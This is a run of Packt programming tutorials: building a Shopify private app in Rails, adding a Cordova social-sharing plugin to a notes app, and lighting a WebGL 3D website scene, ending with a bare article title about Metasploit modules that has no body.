
Building a Private App

Packt
23 May 2014
14 min read
(For more resources related to this topic, see here.)

Even though the app will be simple and only take a few hours to build, we'll still use good development practices to ensure we create a solid foundation. There are many different approaches to software development, and discussing even a fraction of them is beyond the scope of this book. Instead, we'll use a few common concepts, such as requirements gathering, milestones, Test-Driven Development (TDD), frequent code check-ins, and appropriate commenting/documentation. Personal discipline in following development procedures is one of the best things a developer can bring to a project; it is even more important than writing code.

This article will cover the following topics:

- The structure of the app we'll be building
- The development process
- Working with the Shopify API
- Using source control
- Deploying to production

Signing up for Shopify

Before we dive back into code, it would be helpful to get the task of setting up a Shopify store out of the way. Sign up as a Shopify partner by going to http://partners.shopify.com. The benefit of this is that partners can provision stores that can be used for testing. Go ahead and make one now before reading further. Keep your login information close at hand; we'll need it in just a moment.

Understanding our workflow

The general workflow for developing our application is as follows:

1. Pull down the latest version of the master branch.
2. Pick a feature to implement from our requirements list.
3. Create a topic branch to keep our changes isolated.
4. Write tests that describe the behavior desired by our feature.
5. Develop the code until it passes all the tests.
6. Commit and push the code into the remote repository.
7. Pull down the latest version of the master branch and merge it with our topic branch.
8. Run the test suite to ensure that everything still works.
9. Merge the code back with the master branch.
10. Commit and push the code to the remote repository.
The previous list should give you a rough idea of what is involved in a typical software project involving multiple developers. The use of topic branches ensures that our work in progress won't affect other developers (called breaking the build) until we've confirmed that our code has passed all the tests and resolved any conflicts by merging in the latest stable code from the master branch. The practical upside of this methodology is that it allows bug fixes or work from another developer to be added to the project at any time without us having to worry about incomplete code polluting the build. This also gives us the ability to deploy to production from a stable code base. In practice, a lot of projects will also have a production branch (or tagged release) that contains a copy of the code currently running in production. This exists primarily so that, in case of a server failure, the application can be restored without having to worry about new features being released ahead of schedule, and secondly so that if a new deploy introduces bugs, it can easily be rolled back.

Building the application

We'll be building an application that allows Shopify storeowners to organize contests for their shoppers and randomly select a winner. Contests can be configured based on purchase history and timeframe. For example, a contest could be organized for all the customers who bought the newest widget within the last three days, or anyone who has made an order for any product in the month of August. To accomplish this, we'll need to be able to pull down order information from the Shopify store, generate a random winner, and show the storeowner the results.

Let's start out by creating a list of requirements for our application. We'll use this list to break our development into discrete pieces so we can easily measure our progress and also keep our focus on the important features.
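The contest logic just described (filter orders by product and timeframe, then draw a random winner) is small enough to sketch. The app itself is built in Rails, so the following JavaScript is only an illustration of the idea; the function and field names (pickWinner, createdAt, productIds) are hypothetical, not part of the project code:

```javascript
// Illustrative sketch only; the real app implements this in Rails.
// Field names (createdAt, productIds) are hypothetical.
function pickWinner(orders, productId, startDate, endDate) {
  var eligible = orders.filter(function (order) {
    var inWindow = order.createdAt >= startDate && order.createdAt <= endDate;
    var hasProduct = productId === null ||
        order.productIds.indexOf(productId) !== -1;
    return inWindow && hasProduct;
  });
  if (eligible.length === 0) { return null; }
  // Draw a random index from the eligible orders.
  return eligible[Math.floor(Math.random() * eligible.length)];
}
```

A contest for "the newest widget within the last three days" then just amounts to choosing the productId and the date window.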
Of course, it's difficult to make a complete list of all the requirements and have it stick throughout the development process, which is why a common strategy is to develop in iterations (or sprints). The result of an iteration is a working app that can be reviewed by the client so that the remaining features can be reprioritized if necessary.

High-level requirements

The requirements list comprises all the tasks we're going to accomplish in this article. The end result will be an application that we can use to run a contest for a single Shopify store. Included in the following list are any related database, business logic, and user interface coding necessary:

1. Install a few necessary gems.
2. Store Shopify API credentials.
3. Connect to Shopify.
4. Retrieve order information from Shopify.
5. Retrieve product information from Shopify.
6. Clean up the UI.
7. Pick a winner from a list.
8. Create contests.

Now that we have a list of requirements, we can treat each one as a sprint. We will work in a topic branch and merge our code to the master branch at the end of the sprint.

Installing a few necessary gems

The first item on our list is to add a few code libraries (gems) to our application. Let's create a topic branch and do just that. To avoid confusion over which branch contains code for which feature, we can start the branch name with the requirement number. We'll additionally prepend the chapter number for clarity, so our format will be <chapter #>_<requirement #>_<branch name>. Execute the following command line in the root folder of the app:

git checkout -b ch03_01_gem_updates

This command will create a local branch called ch03_01_gem_updates that we will use to isolate our code for this feature. Once we've installed all the gems and verified that the application runs correctly, we'll merge our code back with the master branch. At a minimum, we need to install the gems we want to use for testing. For this app, we'll use RSpec.
We'll need to use the development and test group to make sure the testing gems aren't loaded in production. Add the following code to the block present in the Gemfile:

group :development, :test do
  gem "sqlite3"

  # Helpful gems
  gem "better_errors" # improves error handling
  gem "binding_of_caller" # used by better errors

  # Testing frameworks
  gem 'rspec-rails' # testing framework
  gem "factory_girl_rails" # use factories, not fixtures
  gem "capybara" # simulate browser activity
  gem "fakeweb"

  # Automated testing
  gem 'guard' # automated execution of test suite upon change
  gem "guard-rspec" # guard integration with rspec

  # Only install the rb-fsevent gem if on Mac OS X
  gem 'rb-fsevent' # used for Growl notifications
end

Now we need to head over to the terminal and install the gems via Bundler with the following command:

bundle install

The next step is to install RSpec:

rails generate rspec:install

The final step is to initialize Guard:

guard init rspec

This will create a Guard file and fill it with the default code needed to detect file changes. We can now restart our Rails server and verify that everything works properly. We have to do a full restart to ensure that any initialization files are properly picked up. Once we've ensured that our page loads without issue, we can commit our code and merge it back with the master branch:

git add --all
git commit -am "Added gems for testing"
git checkout master
git merge ch03_01_gem_updates
git push

Great! We've completed our first requirement.

Storing Shopify API credentials

In order to access our test store's API, we'll need to create a Private App and store the provided credentials for future use. Fortunately, Shopify makes this easy for us via the Admin UI:

1. Go to the Apps page.
2. At the bottom of the page, click on the Create a private API key… link.
3. Click on the Generate new Private App button.

We'll now be provided with three important pieces of information: the API key, password, and shared secret.
In addition, we can see from the example URL field that we need to track our Shopify URL as well. Now that we have credentials to programmatically access our Shopify store, we can save them in our application. Let's create a topic branch and get to work:

git checkout -b ch03_02_shopify_credentials

Rails offers a generator called a scaffold that will create the database migration, model, controller, view files, and test stubs for us. Run the following from the command line to create the scaffold for the Account vertical (make sure it is all on one line):

rails g scaffold Account shopify_account_url:string shopify_api_key:string shopify_password:string shopify_shared_secret:string

We'll need to run the database migration to create the database table using the following commands:

bundle exec rake db:migrate
bundle exec rake db:migrate RAILS_ENV=test

Use the following command to update the generated view files to make them Bootstrap compatible:

rails g bootstrap:themed Accounts -f

Head over to http://localhost:3000/accounts and create a new account in our app that uses the Shopify information from the Private App page. It's worth getting Guard to run our test suite every time we make a change so we can ensure that we don't break anything. Open up a new terminal in the root folder of the app and start up Guard:

bundle exec guard

After booting up, Guard will automatically run all our tests. They should all pass because we haven't made any changes to the generated code. If they don't, you'll need to spend time sorting out any failures before continuing. The next step is to make the app more user friendly. We'll make a few changes now and leave the rest for you to do later. Update the layout file so it has accurate navigation; Bootstrap created several dummy links in the header navigation and sidebar.
Update the navigation list in /app/views/layouts/application.html.erb to include the following code:

<a class="brand" href="/">Contestapp</a>
<div class="container-fluid nav-collapse">
  <ul class="nav">
    <li><%= link_to "Accounts", accounts_path %></li>
  </ul>
</div><!--/.nav-collapse -->

Add validations to the account model to ensure that all fields are required when creating/updating an account. Add the following lines to /app/models/account.rb:

validates_presence_of :shopify_account_url
validates_presence_of :shopify_api_key
validates_presence_of :shopify_password
validates_presence_of :shopify_shared_secret

This will immediately cause the controller tests to fail, because they do not pass in all the required fields when attempting to submit the create form. If you look at the top of the file, you'll see some code that creates the :valid_attributes hash. If you read the comment above it, you'll see that we need to update the hash to contain the minimally required fields:

# This should return the minimal set of attributes required
# to create a valid Account. As you add validations to
# Account, be sure to adjust the attributes here as well.
let(:valid_attributes) { {
  "shopify_account_url" => "MyString",
  "shopify_password" => "MyString",
  "shopify_api_key" => "MyString",
  "shopify_shared_secret" => "MyString"
} }

This is a prime example of why having a testing suite is important. It keeps us from writing code that breaks other parts of the application, or in this case, helps us discover a weakness we might not have known we had: the ability to create a new account record without filling in any fields! Now that we have satisfied this requirement and all our tests pass, we can commit the code and merge it with the master branch:

git add --all
git commit -am "Account model and related files"
git checkout master
git merge ch03_02_shopify_credentials
git push

Excellent! We've now completed another critical piece!
Connecting to Shopify

Now that we have a test store to work with, we're ready to implement the code necessary to connect our app to Shopify. First, we need to create a topic branch:

git checkout -b ch03_03_shopify_connection

We are going to use the official Shopify gem to connect our app to our test store, as well as interact with the API. Add this to the Gemfile under the gem 'bootstrap-sass' line:

gem 'shopify_api'

Update the bundle from the command line:

bundle install

We'll also need to restart Guard in order for it to pick up the new gem. This is typically done by using a key combination such as Ctrl + Z (Windows) or Cmd + C (Mac OS X), or by typing the word exit and pressing the Enter key.

I've written a class that encapsulates the Shopify connection logic and initializes the global ShopifyAPI class that we can then use to interact with the API. You can find the code for this class in ch03_shopify_integration.rb. You'll need to copy the contents of this file to your app in a new file located at /app/services/shopify_integration.rb. The contents of the spec file ch03_shopify_integration_spec.rb need to be pasted in a new file located at /spec/services/shopify_integration_spec.rb. Using this class will allow us to execute something like ShopifyAPI::Order.find(:all) to get a list of orders, or ShopifyAPI::Product.find(1234) to retrieve the product with the ID 1234. The spec file contains tests for functionality that we haven't built yet and will initially fail. We'll fix this soon!

We are going to add a Test Connection button to the account page that will give the user instant feedback as to whether or not the credentials are valid. Because we will be adding a new action to our application, we will need to first update the controller, request, routing, and view tests before proceeding.
Given the nature of this article, and because in this case we're connecting to an external service, topics such as mocking and test writing will have to be reviewed as homework. I recommend watching the excellent screencasts created by Ryan Bates at http://railscasts.com as a primer on testing in Rails.

The first step is to update the resources :accounts route in the /config/routes.rb file with the following block:

resources :accounts do
  member do
    get 'test_connection'
  end
end

Copy the controller code from ch03_accounts_controller.rb and replace the code in the /app/controllers/accounts_controller.rb file. This new code adds the test_connection method as well as ensuring the account is loaded properly. Finally, we need to add a button to /app/views/account/show.html.erb that will call this action in div.form-actions:

<%= link_to "Test Connection", test_connection_account_path(@account), :class => 'btn' %>

If we view the account page in our browser, we can now test our Shopify integration. Assuming that everything was copied correctly, we should see a success message after clicking on the Test Connection button. If everything was not copied correctly, we'll see the message that the Shopify API returned to us as a clue to what isn't working. Once all the tests pass, we can commit the code and merge it with the master branch:

git add --all
git commit -am "Shopify connection and related UI"
git checkout master
git merge ch03_03_shopify_connection
git push

Having fun? Good, because things are about to get heavy.

Summary

This article briefly explained integrating with Shopify's API in order to retrieve product and order information from the shop. The UI was then streamlined a bit before the logic to create a contest was built.
Resources for Article:

Further resources on this subject:

- Integrating typeahead.js into WordPress and Ruby on Rails [Article]
- Xen Virtualization: Work with MySQL Server, Ruby on Rails, and Subversion [Article]
- Designing and Creating Database Tables in Ruby on Rails [Article]


Working with the sharing plugin

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.)

Now that we've dealt with the device events, let's get to the real meat of the project: let's add the sharing plugin and see how to use it.

Getting ready

Before continuing, be sure to add the plugin to your project:

cordova plugin add https://github.com/leecrossley/cordova-plugin-social-message.git

Getting on with it

This particular plugin is one of many social network plugins. Each one has its benefits and each one has its problems, and the available plugins are changing rapidly. This particular plugin is very easy to use and supports a reasonable number of social networks. On iOS, Facebook, Twitter, Mail, and Flickr are supported. On Android, any installed app that registers with the intent to share is supported. The full documentation is available at https://github.com/leecrossley/cordova-plugin-social-message at the time of writing this. It is easy to follow if you need to know more than what we cover here.

To show a sharing sheet (the appearance varies based on platform and operating system), all we have to do is this:

window.socialmessage.send ( message );

message is an object that contains any of the following properties:

- text: This is the main content of the message.
- subject: This is the subject of the message. This is only applicable while sending e-mails; most other social networks will ignore this value.
- url: This is a link to attach to the message.
- image: This is an absolute path to the image in order to attach it to the message. It must begin with file:/// and the path should be properly escaped (that is, spaces should become %20, and so on).
- activityTypes (only for iOS): This supports activities on various social networks. Valid values are: PostToFacebook, PostToTwitter, PostToWeibo, Message, Mail, Print, CopyToPasteboard, AssignToContact, and SaveToCameraRoll.
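The image property's requirements (a file:/// prefix, with spaces escaped as %20) are easy to get wrong, so a small helper can normalize a path before handing it to the plugin. This helper is not part of the plugin; it's a hypothetical sketch:

```javascript
// Hypothetical helper (not part of the plugin): normalize a device path into
// the form the image property expects, a file:/// URL with escaped segments.
function toImageUrl(path) {
  // Strip any existing file:// or file:/// scheme and leading slashes,
  // then rebuild the URL, escaping each path segment (spaces become %20).
  var bare = path.replace(/^file:\/{2,3}/, "").replace(/^\/+/, "");
  return "file:///" + bare.split("/").map(encodeURIComponent).join("/");
}
```

For example, toImageUrl("/var/mobile/My Pics/photo.png") yields a properly escaped file:/// URL that can be assigned to message.image.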
In order to create a simple message to share, we can use the following code:

var message = {
    text: "something to send"
};
window.socialmessage.send ( message );

To add an image, we can go a step further, shown as follows:

var message = {
    text: "the caption",
    image: "file:///var/mobile/…/image.png"
};
window.socialmessage.send ( message );

Once this method is called, the sharing sheet will appear. On iOS 7, you'll see something like the following screenshot:

On Android, you will see something like the following screenshot:

What did we do?

In this section, we installed the sharing plugin and we learned how to use it. In the next sections, we'll cover the modifications required to use this plugin.

Modifying the text note edit view

We've dispatched most of the typical sections in this project—there's not really any user interface to design, nor are there any changes to the actual note models. All we need to do is modify the HTML template a little to include a share button and add the code to use the plugin.

Getting on with it

First, let's alter the template in www/html/textNoteEditView.html.
I've highlighted the changes:

<html>
  <body>
    <div class="ui-navigation-bar">
      <div class="ui-title" contenteditable="true">%NOTE_NAME%</div>
      <div class="ui-bar-button-group ui-align-left">
        <div class="ui-bar-button ui-tint-color ui-back-button">%BACK%</div>
      </div>
      <div class="ui-bar-button-group ui-align-right">
        <div class="ui-bar-button ui-destructive-color">%DELETE_NOTE%</div>
      </div>
    </div>
    <div class="ui-scroll-container ui-avoid-navigation-bar ui-avoid-tool-bar">
      <textarea class="ui-text-box">%NOTE_CONTENTS%</textarea>
    </div>
    <div class="ui-tool-bar">
      <div class="ui-bar-button-group ui-align-left"></div>
      <div class="ui-bar-button-group ui-align-center"></div>
      <div class="ui-bar-button-group ui-align-right">
        <div class="ui-bar-button ui-background-tint-color ui-glyph ui-glyph-share share-button"></div>
      </div>
    </div>
  </body>
</html>

Now, let's make the modifications to the view in www/js/app/views/textNoteEditView.js. First, we need to add an internal property that references the share button:

self._shareButton = null;

Next, we need to add code to renderToElement so that we can add an event handler to the share button. We'll do a little bit of checking here to see if we've found the icon, because we don't support sharing of videos and sounds and we don't include that asset in those views. If we didn't have the null check, those views would fail to work. Consider the following code snippet:

self.renderToElement = function () {
  …
  self._shareButton = self.element.querySelector ( ".share-button" );
  if (self._shareButton !== null) {
    Hammer ( self._shareButton ).on("tap", self.shareNote);
  }
  …
}

Finally, we need to add the method that actually shares the note. Note that we save the note before we share it, since that's how the data in the DOM gets transmitted to the note model.
Consider the following code snippet:

self.shareNote = function () {
  self.saveNote();
  var message = {
    subject: self._note.name,
    text: self._note.textContents
  };
  window.socialmessage.send ( message );
}

What did we do?

First, we added a toolbar to the view that looks like the following screenshot—note the new sharing icon:

Then, we added the code that shares the note and attaches that code to the Share button. Here's an example of us sending a tweet from a note on iOS:

What else do I need to know?

Don't forget that social networks often have size limits. For example, Twitter only supports 140 characters, so if you send a note using Twitter, it needs to be a very short note. We could, on iOS, prevent Twitter from being an option, but there's no way to prevent this on Android. Even then, there's no real reason to prevent Twitter from being an option; the user just needs to be familiar enough with the social network to know that they'll have to edit the content before posting it. Also, don't forget that the subject of a message only applies to mail; most other social networks will ignore it. If something is critical, be sure to include it in the text of the message, and not only in the subject.

Modifying the image note edit view

The image note edit view presents an additional difficulty: we can't put the Share button in a toolbar. This is because doing so will cause positioning difficulties with the TEXTAREA and the toolbar when the soft keyboard is visible. Instead, we'll put it in the lower-right corner of the image. This is done by using the same technique we used to outline the camera button.
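Before moving on, the size-limit caveat above can be guarded against in code. The helper below is a hypothetical sketch (not part of the project code): it folds the subject into the text, since only mail honors the subject, and truncates the result to a given network's character limit:

```javascript
// Hypothetical sketch: prepare a message for a character-limited network.
// Folds the subject into the body (only mail uses subject) and truncates,
// leaving room for a single ellipsis character.
function buildMessage(subject, text, maxLength) {
  var body = subject ? subject + ": " + text : text;
  if (maxLength && body.length > maxLength) {
    body = body.slice(0, maxLength - 1) + "\u2026";
  }
  return { subject: subject, text: body };
}
```

A view could call buildMessage(self._note.name, self._note.textContents, 140) before window.socialmessage.send, rather than relying on the user to trim the note.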
Getting on with it

Let's edit the template in www/html/imageNoteEditView.html; again, I've highlighted the changes:

<html>
  <body>
    <div class="ui-navigation-bar">
      <div class="ui-title" contenteditable="true">%NOTE_NAME%</div>
      <div class="ui-bar-button-group ui-align-left">
        <div class="ui-bar-button ui-tint-color ui-back-button">%BACK%</div>
      </div>
      <div class="ui-bar-button-group ui-align-right">
        <div class="ui-bar-button ui-destructive-color">%DELETE_NOTE%</div>
      </div>
    </div>
    <div class="ui-scroll-container ui-avoid-navigation-bar">
      <div class="image-container">
        <div class="ui-glyph ui-background-tint-color ui-glyph-camera outline"></div>
        <div class="ui-glyph ui-background-tint-color ui-glyph-camera non-outline"></div>
        <div class="ui-glyph ui-background-tint-color ui-glyph-share outline"></div>
        <div class="ui-glyph ui-background-tint-color ui-glyph-share non-outline share-button"></div>
      </div>
      <textarea class="ui-text-box"
        onblur="this.classList.remove('editing');"
        onfocus="this.classList.add('editing');">%NOTE_CONTENTS%</textarea>
    </div>
  </body>
</html>

Because sharing an image requires a little additional code, we need to override shareNote (which we inherit from the prior task) in www/js/app/views/imageNoteEditView.js:

self.shareNote = function () {
  var fm = noteStorageSingleton.fileManager;
  var nativePath = fm.getNativeURL ( self._note.mediaContents );
  self.saveNote();
  var message = {
    subject: self._note.name,
    text: self._note.textContents
  };
  if (self._note.unitValue > 0) {
    message.image = nativePath;
  }
  window.socialmessage.send ( message );
}

Finally, we need to add the following styles to www/css/style.css:
div.ui-glyph.ui-background-tint-color.ui-glyph-share.outline,
div.ui-glyph.ui-background-tint-color.ui-glyph-share.non-outline {
  left: inherit;
  width: 50px;
  top: inherit;
  height: 50px;
}
div.ui-glyph.ui-background-tint-color.ui-glyph-share.outline {
  -webkit-mask-position: 15px 16px;
  mask-position: 15px 16px;
}
div.ui-glyph.ui-background-tint-color.ui-glyph-share.non-outline {
  -webkit-mask-position: 15px 15px;
  mask-position: 15px 15px;
}

What did we do?

Like the previous task, we first modified the template to add the share icon. Then, we added the shareNote code to the view (note that we don't have to add anything to find the button, because we inherit that from the text note edit view). Finally, we modified the style sheet to reposition the Share button appropriately so that it looks like the following screenshot:

What else do I need to know?

The image needs to be a valid image, or the plugin may crash. This is why we check the value of unitValue in shareNote: to ensure that the image is large enough to attach to the message. If not, we only share the text.

Game Over... Wrapping it up

And that's it! You've learned how to respond to device events, and you've also added sharing to text and image notes by using a third-party plugin.

Can you take the HEAT? The Hotshot Challenge

There are several ways to improve the project. Why don't you try a few?

- Implement the ability to save the note when the app receives a pause event, and then restore the note when the app is resumed.
- Remember which note is visible when the app is paused, and restore it when the app is resumed. (Hint: localStorage may come in handy.)
- Add video or audio sharing. You'll probably have to alter the sharing plugin or find another (or an additional) plugin. You'll probably also need to upload the data to an external server so that it can be linked via the social network. For example, it's often customary to link to a video on Twitter by using a link shortener.
The File Transfer plugin might come in handy for this challenge (https://github.com/apache/cordova-plugin-file-transfer/blob/dev/doc/index.md).

Summary

This article introduced you to a third-party plugin that provides access to e-mail and various social networks.

Resources for Article:

Further resources on this subject:

- Geolocation – using PhoneGap features to improve an app's functionality, write once use everywhere [Article]
- Configuring the ChildBrowser plugin [Article]
- Using Location Data with PhoneGap [Article]


3D Websites

Packt
23 May 2014
10 min read
(For more resources related to this topic, see here.)

Creating engaging scenes

There is no adopted style for a 3D website. No metaphor can best describe the process of designing the 3D web. Perhaps what we know the most is what does not work. Often, our initial concept is to model the real world. An early design from years ago involved a university that wanted to use its campus map to navigate through its website. One found oneself dragging the mouse repeatedly, as fast as one could, just to get to the other side of campus. A better design would have been a bookshelf where everything was in front of you. To view the chemistry department, just grab the chemistry book, and click on the virtual pages to view the faculty, curriculum, and other department information. Also, if you needed to cross-reference this with the math department's upcoming schedule, you could just grab the math book. Each attempt adds to our knowledge and gets us closer to something better.

What we know is what most other applications of computer graphics learned—that reality might be a starting point, but we should not let it interfere with creativity. 3D for the sake of recreating the real world limits our innovative potential. Following this starting point, strip out the parts bound by physics, such as support beams or poles that serve no purpose in a virtual world. Such items make the rendering slower just by existing. Once we break these bounds, the creative process takes over—perhaps a whimsical version, a parody, something dark and scary, or a world-emphasizing story. Characters in video games and animated movies take on stylized features; the characters are purposely unrealistic or exaggerated. Some of the best animations to exhibit this are Chris Landreth's The Spine and Ryan (Academy Award for best animated short film in 2004), and his earlier work in psychologically driven animation, where the characters break apart by the ravages of personal failure (https://www.nfb.ca/film/ryan).
This demonstration will describe some of the more difficult technical issues involved with lighting, normal maps, and the efficient sharing of 3D models. The following scene uses 3D models and texture maps from previous demonstrations, but with techniques that are more complex.

Engage thrusters

This scene has two lampposts and three brick walls, yet we only read in the texture map and 3D mesh for one of each, and then reuse the same models several times. This has the obvious advantage that we do not need to read in the same 3D models several times, thus saving download time and using less memory. A new function, copyObject(), was created that currently sits inside the main WebGL file, although it can be moved to mesh3dObject.js. In webGLStart(), after the original objects were created, we call copyObject(), passing along the original object with a unique name, location, rotation, and scale. In the following code, we copy the original streetLight0Object into a new streetLight1Object:

streetLight1Object = copyObject( streetLight0Object, "streetLight1",
    streetLight1Location, [1, 1, 1], [0, 0, 0] );

Inside copyObject(), we first create the new mesh and then set the unique name, location (translation), rotation, and scale:

function copyObject(original, name, translation, scale, rotation) {
  meshObjectArray[ totalMeshObjects ] = new meshObject();
  newObject = meshObjectArray[ totalMeshObjects ];
  newObject.name = name;
  newObject.translation = translation;
  newObject.scale = scale;
  newObject.rotation = rotation;

The object to be copied is named original.
We will not need to set up new buffers, since the new 3D mesh can point to the same buffers as the original object:

  newObject.vertexBuffer = original.vertexBuffer;
  newObject.indexedFaceSetBuffer = original.indexedFaceSetBuffer;
  newObject.normalsBuffer = original.normalsBuffer;
  newObject.textureCoordBuffer = original.textureCoordBuffer;
  newObject.boundingBoxBuffer = original.boundingBoxBuffer;
  newObject.boundingBoxIndexBuffer = original.boundingBoxIndexBuffer;
  newObject.vertices = original.vertices;
  newObject.textureMap = original.textureMap;

We do need to create a new bounding box matrix, since it is based on the new object's unique location, rotation, and scale. In addition, meshLoaded is set to false. At this stage, we cannot determine whether the original mesh and texture map have been loaded, since that is done in the background:

  newObject.boundingBoxMatrix = mat4.create();
  newObject.meshLoaded = false;
  totalMeshObjects++;
  return newObject;
}

There is just one more inclusion, inside drawScene(), to inform us that the original 3D mesh and texture map(s) have been loaded:

streetLightCover1Object.meshLoaded = streetLightCover0Object.meshLoaded;
streetLightCover1Object.textureMap = streetLightCover0Object.textureMap;

This is set each time a frame is drawn, and thus is redundant once the mesh and texture map have been loaded, but the additional code is a very small hit in performance. Similar steps are performed for the original brick wall and its two copies.

Most of the scene is programmed using fragment shaders. There are four lights: the two streetlights, the neon Products sign, and the moon, which sets and rises. The brick wall uses normal maps. However, it is more complex here due to the use of spotlights and light attenuation, where the light fades over a distance. The faint moonlight, however, does not fade over a distance.
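The attenuation just mentioned can be sketched outside GLSL. The classic form divides by a polynomial in the distance; the coefficient names below are the textbook constant/linear/quadratic terms, not necessarily the exact variables used in this scene's shader:

```javascript
// Classic distance attenuation: 1 / (kc + kl*d + kq*d^2).
// A light that "does not fade over a distance", like the moonlight described
// above, can simply use kl = kq = 0, which makes the factor constant.
function attenuate(distance, kc, kl, kq) {
  return 1.0 / (kc + kl * distance + kq * distance * distance);
}
```

With kc = 1, the factor is 1.0 at the light itself and falls off smoothly as the distance grows.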
Opening scene with four light sources: two streetlights, the Products neon sign, and the moon This program has only three shaders: LightsTextureMap, used by the brick wall with a texture normal map; Lights, used for any object that is illuminated by one or more lights; and Illuminated, used by the light sources such as the moon, neon sign, and streetlight covers. The simplest of these fragment shaders is Illuminated. It consists of a texture map and the illuminated color, uLightColor. For many objects, the texture map would simply be a white placeholder. However, the moon uses a texture map, available for free from NASA, that must be merged with its color: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s, vTextureCoord.t)); gl_FragColor = vec4(fragmentColor.rgb * uLightColor, 1.0); The light color also serves another purpose, as it will be passed on to the other two fragment shaders, since each light adds its own individual color: off-white for the streetlights, gray for the moon, and pink for the neon sign. The next step is to use the shaderLights fragment shader. We begin by setting the ambient light, which is a dim light added to every pixel, usually about 0.1, so that nothing is pitch black. 
Then, we make a call to the calculateLightContribution() function for each of our four light sources (two streetlights, the moon, and the neon sign): void main(void) { vec3 lightWeighting = vec3(uAmbientLight, uAmbientLight, uAmbientLight); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight0Loc, uSpotLightDir, false); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight1Loc, uSpotLightDir, false); lightWeighting += uMoonLightColor * calculateLightContribution(uMoonLightPos, vec3(0.0, 0.0, 0.0), true); lightWeighting += uProductTextColor * calculateLightContribution(uProductTextLoc, vec3(0.0, 0.0, 0.0), true); All four calls to calculateLightContribution() are multiplied by the light's color (white for the streetlights, gray for the moon, and pink for the neon sign). The parameters in the call to calculateLightContribution(vec3, vec3, bool) are: the location of the light, its direction, and a point-light flag. The flag is true for a point light that illuminates in all directions, or false for a spotlight that points in a specific direction. Since point lights such as the moon or neon sign have no direction, their direction parameter is not used and is simply set to a default of vec3(0.0, 0.0, 0.0). The vec3 lightWeighting value accumulates the red, green, and blue light colors at each pixel. However, these values cannot exceed the maximum of 1.0 for red, green, and blue. Colors greater than 1.0 are rendered unpredictably, depending on the graphics card. So, the red, green, and blue light colors must be capped at 1.0: if ( lightWeighting.r > 1.0 ) lightWeighting.r = 1.0; if ( lightWeighting.g > 1.0 ) lightWeighting.g = 1.0; if ( lightWeighting.b > 1.0 ) lightWeighting.b = 1.0; Finally, we calculate each pixel's color based on the texture map. 
Only the street and streetlight posts use this shader, and neither have any tiling, but the multiplication by uTextureMapTiling was included in case there was tiling. The fragmentColor based on the texture map is multiplied by lightWeighting—the accumulation of our four light sources for the final color of each pixel: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)); gl_FragColor = vec4(fragmentColor.rgb * lightWeighting.rgb, 1.0); } In the calculateLightContribution() function, we begin by determining the angle between the light's direction and point's normal. The dot product is the cosine between the light's direction to the pixel and the pixel's normal, which is also known as Lambert's cosine law (http://en.wikipedia.org/wiki/Lambertian_reflectance): vec3 distanceLightToPixel = vec3(vPosition.xyz - lightLoc); vec3 vectorLightPosToPixel = normalize(distanceLightToPixel); vec3 lightDirNormalized = normalize(lightDir); float angleBetweenLightNormal = dot( -vectorLightPosToPixel, vTransformedNormal ); A point light shines in all directions, but a spotlight has a direction and an expanding cone of light surrounding this direction. For a pixel to be lit by a spotlight, that pixel must be in this cone of light. 
This is the beam width area where the pixel receives the full amount of light; the light then fades out towards the cut-off angle, the angle beyond which this spotlight contributes no more light: With texture maps removed, we reveal the value of the dot product between the pixel normal and direction of the light if ( pointLight ) { lightAmt = 1.0; } else { // spotlight float angleLightToPixel = dot( vectorLightPosToPixel, lightDirNormalized ); // note, uStreetLightBeamWidth and uStreetLightCutOffAngle // are the cosines of the angles, not actual angles if ( angleLightToPixel >= uStreetLightBeamWidth ) { lightAmt = 1.0; } else if ( angleLightToPixel > uStreetLightCutOffAngle ) { lightAmt = (angleLightToPixel - uStreetLightCutOffAngle) / (uStreetLightBeamWidth - uStreetLightCutOffAngle); } } After determining the amount of light at that pixel, we calculate attenuation, which is the fall-off of light over a distance. Without attenuation, the light is constant. The moon has no light attenuation since it's dim already, but the other three lights fade out towards a maximum distance. The float maxDist = 15.0; code snippet says that after 15 units, there is no more contribution from this light. If we are less than 15 units away from the light, the amount of light is reduced proportionately. For example, a pixel 10 units away from the light source receives (15-10)/15 or 1/3 the amount of light: attenuation = 1.0; if ( uUseAttenuation ) { if ( length(distanceLightToPixel) < maxDist ) { attenuation = (maxDist - length(distanceLightToPixel))/maxDist; } else attenuation = 0.0; } Finally, we multiply the values that make up the light contribution and we are done: lightAmt *= angleBetweenLightNormal * attenuation; return lightAmt; Next, we must account for the brick wall's normal map using the shaderLightsNormalMap-fs fragment shader. The normal is equal to rgb * 2 - 1. For example, rgb (1.0, 0.5, 0.0), which is orange, would become the normal (1.0, 0.0, -1.0). 
This normal is converted to a unit value, or normalized, to (0.707, 0, -0.707): vec4 textureMapNormal = vec4( (texture2D(uSamplerNormalMap, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)) * 2.0) - 1.0 ); vec3 pixelNormal = normalize(uNMatrix * normalize(textureMapNormal.rgb) ); A normal mapped brick (without the red brick texture image) reveals how changing the pixel normal alters the shading with various light sources We call the same calculateLightContribution() function, but we now pass along pixelNormal, calculated using the normal texture map: calculateLightContribution(uSpotLight0Loc, uSpotLightDir, pixelNormal, false); From here, much of the code is the same, except we use pixelNormal in the dot product to determine the angle between the normal and the light sources: float angleLightToTextureMap = dot( -vectorLightPosToPixel, pixelNormal ); Now, angleLightToTextureMap replaces angleBetweenLightNormal because we are no longer using the vertex normal embedded in the 3D mesh's .obj file, but instead the pixel normal derived from the normal texture map file, brickNormalMap.png. A normal mapped brick wall with various light sources Objective complete – mini debriefing This comprehensive demonstration combined multiple spot and point lights, shared 3D meshes instead of loading duplicates, and deployed normal texture maps for a realistic 3D brick wall appearance. The next step is to build upon this demonstration, inserting links to the web pages found on a typical website. In this example, we just identified a location for Products, using a neon sign to catch the user's attention. As a 3D website is built, we will need better ways to navigate this virtual space, and this is covered in the following section.
Packt
23 May 2014
11 min read

Ruby and Metasploit Modules

